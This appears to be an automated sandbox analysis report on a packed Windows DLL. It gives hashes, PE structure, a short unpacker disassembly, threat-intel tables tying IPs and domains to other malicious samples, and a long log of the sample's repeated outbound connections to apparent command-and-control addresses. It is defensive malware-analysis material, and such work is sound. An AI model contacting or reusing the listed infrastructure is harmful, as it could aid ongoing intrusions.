• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: NaRZIOq3O8.dll
| Time | Type | Description |
| --- | --- | --- |
| 08:23:08 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified |
| 08:23:36 | API Interceptor | 2585226x Sleep call for process: rundll32.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| 202.108.0.52 | VqCbf9fhnQ.exe | malicious | Unknown | blog.sina.com.cn/u/5655029807 |
| 202.108.0.52 | k4F4uRTZZR.dll | malicious | Unknown | blog.sina.com.cn/u/5655029807 |
| 202.108.0.52 | 5jme4p7u76.exe | malicious | Unknown | blog.sina.com.cn/u/5655029807 |
| 107.163.241.186 | 33twe7X26S.dll | malicious | Unknown | |
| 107.163.241.186 | 5jme4p7u76.exe | malicious | Unknown | |
| 107.163.241.185 | 33twe7X26S.dll | malicious | Unknown | |
| 107.163.241.185 | 5jme4p7u76.exe | malicious | Unknown | |
| 107.163.241.193 | 33twe7X26S.dll | malicious | Unknown | |
| 107.163.241.193 | k4F4uRTZZR.dll | malicious | Unknown | |
| 107.163.241.193 | 5jme4p7u76.exe | malicious | Unknown | |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| blogx.sina.com.cn | MYuRWuVXzX.dll | malicious | Unknown | 202.108.0.52 |
| blogx.sina.com.cn | yKVQVNB2qI.dll | malicious | Unknown | 202.108.0.52 |
| blogx.sina.com.cn | gmqIbj35WF.dll | malicious | Unknown | 202.108.0.52 |
| blogx.sina.com.cn | 81mieek02V.dll | malicious | Unknown | 202.108.0.52 |
| blogx.sina.com.cn | Vb1S2HJcnN.dll | malicious | Unknown | 202.108.0.52 |
| blogx.sina.com.cn | VqCbf9fhnQ.exe | malicious | Unknown | 202.108.0.52 |
| blogx.sina.com.cn | k4F4uRTZZR.dll | malicious | Unknown | 202.108.0.52 |
| blogx.sina.com.cn | http://zeuso.cc | malicious | Unknown | 202.108.0.52 |
| blogx.sina.com.cn | 02hNixBIvP.exe | malicious | Unknown | 202.108.0.52 |
| blogx.sina.com.cn | 5jme4p7u76.exe | malicious | Unknown | 202.108.0.52 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| TAKE2US | 33twe7X26S.dll | malicious | Unknown | 107.163.241.193 |
| TAKE2US | MYuRWuVXzX.dll | malicious | Unknown | 107.163.56.110 |
| TAKE2US | JwLT3elUtn.dll | malicious | Unknown | 107.163.43.161 |
| TAKE2US | yKVQVNB2qI.dll | malicious | Unknown | 107.163.56.240 |
| TAKE2US | 46PhJ3XpBT.dll | malicious | Unknown | 107.163.43.236 |
| TAKE2US | 01JkTmNJhe.dll | malicious | Unknown | 107.163.43.235 |
| TAKE2US | oQy3XhO4cX.dll | malicious | Unknown | 107.163.56.251 |
| TAKE2US | gmqIbj35WF.dll | malicious | Unknown | 107.163.56.240 |
| TAKE2US | Bcr1Wl2Jn0.dll | malicious | Unknown | 107.163.56.240 |
| TAKE2US | OL50O9ho5M.dll | malicious | Unknown | 107.163.56.251 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | MYuRWuVXzX.dll | malicious | Unknown | 202.108.0.52 |
| CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | yKVQVNB2qI.dll | malicious | Unknown | 202.108.0.52 |
| CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | gmqIbj35WF.dll | malicious | Unknown | 202.108.0.52 |
| CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | 81mieek02V.dll | malicious | Unknown | 202.108.0.52 |
| CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | Vb1S2HJcnN.dll | malicious | Unknown | 202.108.0.52 |
| CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | owari.mips.elf | malicious | Unknown | 111.193.177.206 |
| CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | owari.x86.elf | malicious | Unknown | 60.194.199.155 |
| CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | VqCbf9fhnQ.exe | malicious | Unknown | 202.108.0.52 |
| CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | hmips.elf | malicious | Mirai | 111.196.123.227 |
| CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | botx.m68k.elf | malicious | Mirai | 123.112.202.42 |
                                    No context
                                    No context
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: ISO-8859 text, with CRLF line terminators
Category: dropped
Size (bytes): 812
Entropy (8bit): 4.3571728803400465
Encrypted: false
SSDEEP: 12:82vQnZ4oTzmmMrJk2qSCz/+ogjgjgjgjgjgjgjgjgR:82WDMrJkXqh
MD5: B8A7CA3310C0048B9E0F577E01844BB2
SHA1: FF1152820A4C88C77F741D53FE062ECAB673BA1F
SHA-256: 1BA9E7418B04DB1005E7D51D36E146CB51C051046AF72706F7899146A1FD079C
SHA-512: 1B103098A091609061BDF9426AB11B0B79DD9B01D289E272261FCFAD8C0685398FA00C794E776DEAD87602A1D8993DCDAFFDB16E296566AEA84AA382E4905EF1
Malicious: false
Preview: ..2024-11-19 12:17..iOffset....2024-11-19 18:33..iOffset....2024-11-20 01:09..iOffset....2024-11-20 08:45..iOffset....2024-11-20 14:41..iOffset....2024-11-20 23:08..iOffset....2024-11-21 08:59..iOffset....2024-11-21 23:05..iOffset....2024-11-22 20:41..iOffset....2024-11-24 10:42..iOffset....2024-11-25 21:03..iOffset....2025-09-26 02:19..iOffset....2026-07-25 01:57..iOffset....2028-02-02 02:58..iOffset....2029-10-10 15:24..iOffset....2031-06-19 11:25..iOffset....2033-02-17 20:16..iOffset....2034-10-02 12:07..iOffset....2036-04-15 07:18..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset..
File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit): 7.818659598157651
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 94.25%
• UPX compressed Win32 Executable (30571/9) 2.88%
• Win32 EXE Yoda's Crypter (26571/9) 2.50%
• Generic Win/DOS Executable (2004/3) 0.19%
• DOS Executable Generic (2002/1) 0.19%
File name: NaRZIOq3O8.dll
File size: 100'093 bytes
MD5: 8ae5deac29c6d351c2376da97b75b88a
SHA1: e999daea87b481d11b4fd8559bdd3d68516dc0ef
SHA256: 6831f236816f9799458cff0c50116bcc3029f57e8cd8ab181204bc914789c1df
SHA512: a69fd417bda9b491924222066f77172c6c2a217ec6e9269f4037ff2953afb7148a31465f48705480ccc862e10c86185cb595482b9ed9c93a4dd48194396b0582
SSDEEP: 3072:BDpG6gzgHr5tCmfk455ecDBkdq+SStvAbGh:5pG6Sg9txRk/SS6bGh
TLSH: B0A301F6290D7DD6CB35483AD6628E35F929EE348C589F887ECE6C13ACB8510E1641F1
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.......N.......N.K.....N.F.....N.F.@...N.-.D...N...O...N.-.E...N.}.H...N.-.J...N.Rich..N.........PE..L..
Icon Hash: 7ae282899bbab082
Entrypoint: 0x10037000
Entrypoint Section: fdss
Digitally signed: false
Imagebase: 0x10000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp: 0x5644242A [Thu Nov 12 05:31:22 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: e410f49346b1cb4eeca484464a7085c8
                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    push FFFFFFFFh
                                    push 000A2C2Ah
                                    push 000D9038h
                                    mov eax, dword ptr fs:[00000000h]
                                    push eax
                                    mov dword ptr fs:[00000000h], esp
                                    pop eax
                                    mov dword ptr fs:[00000000h], eax
                                    pop eax
                                    pop eax
                                    pop eax
                                    pop eax
                                    mov ebp, eax
                                    mov eax, 10034530h
                                    jmp eax
                                    nop
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    sub eax, dword ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    Programming Language:
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ C ] VS98 (6.0) build 8168
                                    • [C++] VS98 (6.0) build 8168
                                    • [RES] VS98 (6.0) cvtres build 1720
                                    • [LNK] VS98 (6.0) imp/exp build 8168
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x366a8 | 0x3c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x363f8 | 0x2b0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x35000 | 0x13f8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x366e4 | 0xc | .rsrc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
Sections:
Name   Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
UPX0   0x1000           0x1d000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1   0x1e000          0x17000       0x16800   cb1026f8f75c78cc70a618d3d8d74f16  False     0.9822157118055556  data       7.919300310478591  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  0x35000          0x2000        0x1800    79e4d91889da7eba4072fabd611a7062  False     0.2890625           data       4.305579106560728  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fdss   0x37000          0x208         0x200     da18cbcff70aaec6311fc739f52e246c  False     0.115234375         data       0.703199634755278  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Resources:
Name       RVA      Size   Type                                                                                          Language  Country        ZLIB Complexity
RT_BITMAP  0x351d4  0x528  Device independent bitmap graphic, 14 x 16 x 8, image size 256, resolution 2835 x 2835 px/m  English   United States  0.1
RT_BITMAP  0x35700  0x528  Device independent bitmap graphic, 14 x 16 x 8, image size 256, resolution 2835 x 2835 px/m  English   United States  0.08409090909090909
RT_BITMAP  0x35c2c  0x50   Device independent bitmap graphic, 8 x 8 x 1, image size 32                                   English   United States  0.4125
RT_BITMAP  0x35c80  0x50   Device independent bitmap graphic, 8 x 8 x 1, image size 32                                   English   United States  0.4875
RT_HTML    0x35cd4  0x49   HTML document, ASCII text, with CRLF line terminators                                         English   United States  0.8493150684931506
RT_HTML    0x35d24  0xd    HTML document, ASCII text, with no line terminators                                           English   United States  1.3076923076923077
RT_HTML    0x35d38  0x6be  HTML document, ASCII text, with CRLF line terminators                                         English   United States  0.5179606025492468
Imports:
DLL           Import
KERNEL32.DLL  LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree
ADVAPI32.dll  RegOpenKeyA
MFC42.DLL
MSVCP60.dll   ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
MSVCRT.dll    free
NETAPI32.dll  Netbios
ole32.dll     CoUninitialize
OLEAUT32.dll  SysStringLen
SHLWAPI.dll   StrStrIA
USER32.dll    wsprintfA
WS2_32.dll    htons
Exports:
Name   Ordinal  Address
Group  1        0x1000bb70

Language of compilation system  Country where language is spoken  Map
English                         United States
Network traffic:
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Nov 19, 2024 14:23:08.957200050 CET  49707        16300      192.168.2.10  107.163.241.185
Nov 19, 2024 14:23:09.966401100 CET  49707        16300      192.168.2.10  107.163.241.185
Nov 19, 2024 14:23:11.966533899 CET  49707        16300      192.168.2.10  107.163.241.185
Nov 19, 2024 14:23:15.966486931 CET  49707        16300      192.168.2.10  107.163.241.185
Nov 19, 2024 14:23:23.966353893 CET  49707        16300      192.168.2.10  107.163.241.185
Nov 19, 2024 14:23:30.998902082 CET  49714        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:23:32.013276100 CET  49714        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:23:34.006580114 CET  49715        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:34.006978035 CET  49716        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:34.013407946 CET  49714        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:23:35.013273954 CET  49715        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:35.013276100 CET  49716        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:37.013442039 CET  49715        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:37.014686108 CET  49716        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:37.285955906 CET  49717        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:38.013365030 CET  49714        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:23:38.154891968 CET  49718        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:38.268796921 CET  49719        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:38.331680059 CET  49720        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:39.169543028 CET  49718        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:39.372653008 CET  49719        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:39.372862101 CET  49720        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:41.169550896 CET  49718        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:41.372699976 CET  49719        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:41.372700930 CET  49720        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:42.155886889 CET  49721        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:42.327006102 CET  49722        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:42.342318058 CET  49723        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:43.263325930 CET  49721        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:43.357085943 CET  49723        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:43.372678041 CET  49722        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:45.372658014 CET  49723        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:45.372704029 CET  49721        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:45.372740984 CET  49722        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:46.060179949 CET  49714        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:23:46.174069881 CET  49729        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:46.284956932 CET  49730        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:46.285339117 CET  49731        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:47.278950930 CET  49730        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:47.370641947 CET  49729        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:47.370731115 CET  49731        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:49.294560909 CET  49730        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:49.466442108 CET  49729        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:49.466748953 CET  49731        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:50.213088989 CET  49733        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:50.420217991 CET  49734        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:50.435606003 CET  49735        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:51.372833014 CET  49733        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:51.435192108 CET  49735        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:51.575663090 CET  49734        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:52.281212091 CET  49736        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:23:53.372790098 CET  49733        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:53.372797966 CET  49736        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:23:53.482116938 CET  49735        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:53.669656038 CET  49734        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:54.217175961 CET  49737        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:54.334358931 CET  49738        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:54.656538010 CET  49739        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:55.216520071 CET  49737        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:55.341499090 CET  49738        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:55.388391018 CET  49736        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:23:55.653992891 CET  49739        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:57.216496944 CET  49737        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:57.342683077 CET  49738        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:57.669692039 CET  49739        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:58.233233929 CET  49740        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:58.348911047 CET  49741        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:58.351689100 CET  49742        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:59.247757912 CET  49740        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:59.341526031 CET  49741        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:23:59.357135057 CET  49742        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:23:59.388401985 CET  49736        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:01.250782013 CET  49740        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:01.341530085 CET  49741        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:01.372750998 CET  49742        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:02.248543978 CET  49743        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:02.361884117 CET  49744        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:02.362907887 CET  49745        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:03.250777960 CET  49743        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:03.372828960 CET  49745        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:03.372876883 CET  49744        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:05.247852087 CET  49743        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:05.372807026 CET  49744        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:05.372869968 CET  49745        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:06.290110111 CET  49746        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:06.882675886 CET  49747        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:06.886926889 CET  49748        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:07.294680119 CET  49746        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:07.388384104 CET  49736        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:07.888421059 CET  49748        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:07.888422012 CET  49747        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:09.294720888 CET  49746        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:09.888407946 CET  49747        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:09.888492107 CET  49748        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:10.295761108 CET  49750        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:10.431253910 CET  49751        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:10.433980942 CET  49752        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:11.310305119 CET  49750        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:11.435338974 CET  49751        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:11.435523987 CET  49752        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:13.310282946 CET  49750        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:13.435307026 CET  49751        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:13.437458992 CET  49752        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:13.499169111 CET  49753        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:14.311327934 CET  49754        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:14.513420105 CET  49753        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:14.545057058 CET  49755        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:14.579710960 CET  49756        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:15.325906992 CET  49754        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:15.560389996 CET  49755        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:15.591620922 CET  49756        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:16.513425112 CET  49753        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:17.341630936 CET  49754        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:17.560376883 CET  49755        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:17.591751099 CET  49756        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:18.353575945 CET  49757        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:18.470721006 CET  49758        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:18.524342060 CET  49759        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:19.357167006 CET  49757        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:19.482163906 CET  49758        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:19.544698000 CET  49759        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:20.654093027 CET  49753        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:21.357219934 CET  49757        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:21.482171059 CET  49758        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:21.565722942 CET  49759        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:22.358028889 CET  49760        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:22.560842037 CET  49761        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:22.561245918 CET  49762        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:23.357233047 CET  49760        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:23.560363054 CET  49761        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:23.619606018 CET  49762        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:25.357341051 CET  49760        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:25.576013088 CET  49761        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:25.638609886 CET  49762        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:26.358103037 CET  49763        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:26.473026991 CET  49764        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:26.473716974 CET  49765        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:27.372816086 CET  49763        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:27.482403040 CET  49764        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:27.638541937 CET  49765        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:28.747883081 CET  49753        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:29.388641119 CET  49763        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:29.497852087 CET  49764        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:29.747889996 CET  49765        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:30.373573065 CET  49767        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:31.055069923 CET  49768        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:31.055732965 CET  49769        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:31.373150110 CET  49767        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:32.060437918 CET  49769        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:32.138575077 CET  49768        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:33.388520956 CET  49767        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:34.060465097 CET  49769        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:34.138485909 CET  49768        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:34.374361992 CET  49770        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:34.487642050 CET  49771        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:34.488637924 CET  49772        80         192.168.2.10  202.108.0.52
Nov 19, 2024 14:24:34.878078938 CET  49773        6520       192.168.2.10  107.163.241.193
Nov 19, 2024 14:24:35.372873068 CET  49770        12354      192.168.2.10  107.163.241.186
Nov 19, 2024 14:24:35.497899055 CET  49771        12354      192.168.2.10  107.163.241.186
